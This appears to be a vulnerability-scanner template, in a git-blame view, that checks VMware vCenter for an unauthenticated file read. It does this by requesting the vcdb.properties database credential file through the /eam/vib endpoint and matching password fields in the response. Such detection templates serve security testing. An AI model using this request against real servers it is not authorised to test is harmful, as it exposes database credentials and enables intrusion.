2020-10-13 14:24:30 +00:00
|
|
|
id: vmware-vcenter-lfi
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: VMware vCenter Unauthenticated Arbitrary File Read
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: high
|
|
|
|
description: https://twitter.com/ptswarm/status/1316016337550938122
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\\vcdb.properties"
|
|
|
|
headers:
|
|
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
|
|
|
- "(driver|dbtype|password(\\.encrypted)?)\\s="
|
2020-10-13 14:34:08 +00:00
|
|
|
part: body
|
2020-10-13 14:24:30 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|